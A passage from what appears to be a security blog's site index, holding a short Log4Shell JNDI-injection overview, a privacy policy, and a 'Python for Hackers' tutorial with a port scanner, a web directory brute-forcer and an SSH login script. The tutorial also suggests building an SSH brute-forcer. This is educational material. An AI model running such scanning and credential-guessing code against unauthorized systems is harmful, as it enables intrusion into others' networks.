where Log4j is deployed Virtual Patching (WAF rules) is critical for rapid response ","permalink":"https://cyberah-blog.pages.dev/en/cve/cve-2024-log4shell-analysis/","summary":"\u003cblockquote\u003e\n\u003cp\u003e⚠️ \u003cstrong\u003eDisclaimer\u003c/strong\u003e: This article is for educational purposes only. Only test on systems you have explicit authorization to test.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch2 id=\"overview\"\u003eOverview\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eVulnerability Type\u003c/strong\u003e: Remote Code Execution (RCE) via JNDI Injection\n\u003cstrong\u003eImpact\u003c/strong\u003e: Critical (CVSS 10.0)\n\u003cstrong\u003eAffected Systems\u003c/strong\u003e: Apache Log4j 2.0-beta9 to 2.14.1\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"how-the-vulnerability-works\"\u003eHow the Vulnerability Works\u003c/h2\u003e\n\u003ch3 id=\"understanding-jndi\"\u003eUnderstanding JNDI\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eJNDI\u003c/strong\u003e (Java Naming and Directory Interface) is a Java API for connecting to directory services like LDAP.\u003c/p\u003e\n\u003cp\u003eThe problem: Log4j would interpret user input and fetch external resources:\u003c/p\u003e","title":"CVE Analysis — Log4Shell Pattern: A JNDI Injection Deep Dive"},{"content":"Privacy Policy Last updated: April 19, 2026\nData Collection We do not collect personally identifiable information. We use Google Analytics for anonymous traffic analysis.\nCookies We may use cookies to improve your reading experience and store preferences. You can disable them in your browser settings.\nAdvertising We use Google AdSense to display advertisements. Google may use cookies to show personalized ads based on your browsing.\nComments The comment system uses Giscus, linked to GitHub. Please review GitHub\u0026rsquo;s Privacy Statement.\nContact For any privacy inquiries: support@zerostrike.net\n","permalink":"https://cyberah-blog.pages.dev/en/privacy/","summary":"\u003ch2 id=\"privacy-policy\"\u003ePrivacy Policy\u003c/h2\u003e\n\u003cp\u003eLast updated: April 19, 2026\u003c/p\u003e\n\u003ch3 id=\"data-collection\"\u003eData Collection\u003c/h3\u003e\n\u003cp\u003eWe do not collect personally identifiable information. We use Google Analytics for anonymous traffic analysis.\u003c/p\u003e\n\u003ch3 id=\"cookies\"\u003eCookies\u003c/h3\u003e\n\u003cp\u003eWe may use cookies to improve your reading experience and store preferences. You can disable them in your browser settings.\u003c/p\u003e\n\u003ch3 id=\"advertising\"\u003eAdvertising\u003c/h3\u003e\n\u003cp\u003eWe use Google AdSense to display advertisements. Google may use cookies to show personalized ads based on your browsing.\u003c/p\u003e\n\u003ch3 id=\"comments\"\u003eComments\u003c/h3\u003e\n\u003cp\u003eThe comment system uses Giscus, linked to GitHub. Please review \u003ca href=\"https://docs.github.com/en/site-policy/privacy-policies/github-privacy-statement\"\u003eGitHub\u0026rsquo;s Privacy Statement\u003c/a\u003e.\u003c/p\u003e","title":"Privacy Policy"},{"content":"Why Python for Cybersecurity? Python is the #1 language for security professionals because of its rich libraries (socket, requests, scapy, paramiko), rapid development, and massive community.\nNetwork Programming Basics Single Port Checker import socket def check_port(host, port, timeout=1): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((host, port)) sock.close() return result == 0 except socket.error: return False target = \u0026#34;192.168.1.1\u0026#34; for port in range(1, 1025): if check_port(target, port): print(f\u0026#34;[+] Port {port} is OPEN\u0026#34;) Multithreaded Port Scanner import socket import concurrent.futures def scan_port(args): host, port = args try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.5) result = sock.connect_ex((host, port)) sock.close() if result == 0: try: service = socket.getservbyport(port) except Exception: service = \u0026#34;unknown\u0026#34; return port, service except Exception: pass return None def fast_scan(host, start=1, end=1024): print(f\u0026#34;[*] Scanning {host}...\u0026#34;) with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor: results = executor.map(scan_port, [(host, p) for p in range(start, end+1)]) for result in results: if result: print(f\u0026#34;[+] {result[0]}/tcp OPEN {result[1]}\u0026#34;) fast_scan(\u0026#34;192.168.1.1\u0026#34;) HTTP Requests for Recon import requests from concurrent.futures import ThreadPoolExecutor def check_path(url, path): full_url = f\u0026#34;{url}/{path}\u0026#34; try: resp = requests.get(full_url, timeout=3, allow_redirects=False) if resp.status_code not in [404, 403]: return full_url, resp.status_code except requests.RequestException: pass return None def dir_bruteforce(url, wordlist_path): with open(wordlist_path) as f: words = [line.strip() for line in f if line.strip()] with ThreadPoolExecutor(max_workers=20) as executor: for result in executor.map(lambda w: check_path(url, w), words): if result: print(f\u0026#34;[{result[1]}] {result[0]}\u0026#34;) dir_bruteforce(\u0026#34;http://target.com\u0026#34;, \u0026#34;/usr/share/wordlists/dirb/common.txt\u0026#34;) SSH with Paramiko import paramiko def ssh_connect(host, username, password, port=22): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(host, port=port, username=username, password=password, timeout=5) _, stdout, _ = client.exec_command(\u0026#34;id \u0026amp;\u0026amp; hostname\u0026#34;) print(stdout.read().decode()) client.close() return True except paramiko.AuthenticationException: return False Recommended Projects to Build Port Scanner ← Start here Subdomain Enumeration tool Web Directory Brute-forcer Packet Sniffer using Scapy SSH brute-force (authorized targets only!) ","permalink":"https://cyberah-blog.pages.dev/en/programming/python-for-hackers/","summary":"\u003ch2 id=\"why-python-for-cybersecurity\"\u003eWhy Python for Cybersecurity?\u003c/h2\u003e\n\u003cp\u003ePython is the #1 language for security professionals because of its rich libraries (\u003ccode\u003esocket\u003c/code\u003e, \u003ccode\u003erequests\u003c/code\u003e, \u003ccode\u003escapy\u003c/code\u003e, \u003ccode\u003eparamiko\u003c/code\u003e), rapid development, and massive community.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"network-programming-basics\"\u003eNetwork Programming Basics\u003c/h2\u003e\n\u003ch3 id=\"single-port-checker\"\u003eSingle Port Checker\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003esocket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003echeck_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAF_INET\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSOCK_STREAM\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esettimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect_ex\u003c/span\u003e\u003cspan class=\"p\"\u003e((\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e))\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e==\u003c/span\u003e \u003cspan class=\"mi\"\u003e0\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eerror\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eFalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003etarget\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;192.168.1.1\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"nb\"\u003erange\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"mi\"\u003e1025\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003echeck_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003etarget\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[+] Port \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e is OPEN\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"multithreaded-port-scanner\"\u003eMultithreaded Port Scanner\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003esocket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003econcurrent.futures\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003escan_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eargs\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eargs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAF_INET\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSOCK_STREAM\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esettimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"mf\"\u003e0.5\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect_ex\u003c/span\u003e\u003cspan class=\"p\"\u003e((\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e))\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e==\u003c/span\u003e \u003cspan class=\"mi\"\u003e0\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eservice\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003egetservbyport\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"ne\"\u003eException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eservice\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;unknown\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eservice\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"ne\"\u003eException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003epass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eNone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003efast_scan\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003estart\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eend\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e1024\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[*] Scanning \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e...\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ewith\u003c/span\u003e \u003cspan class=\"n\"\u003econcurrent\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003efutures\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eThreadPoolExecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003emax_workers\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e100\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003eas\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eresults\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003emap\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003escan_port\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"p\"\u003e[(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ep\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003ep\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"nb\"\u003erange\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003estart\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eend\u003c/span\u003e\u003cspan class=\"o\"\u003e+\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e)])\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"n\"\u003eresults\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[+] \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e0\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e/tcp OPEN \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003efast_scan\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;192.168.1.1\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"http-requests-for-recon\"\u003eHTTP Requests for Recon\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003erequests\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003efrom\u003c/span\u003e \u003cspan class=\"nn\"\u003econcurrent.futures\u003c/span\u003e \u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"n\"\u003eThreadPoolExecutor\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003echeck_path\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003epath\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003efull_url\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e/\u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003epath\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eresp\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003erequests\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eget\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003efull_url\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan 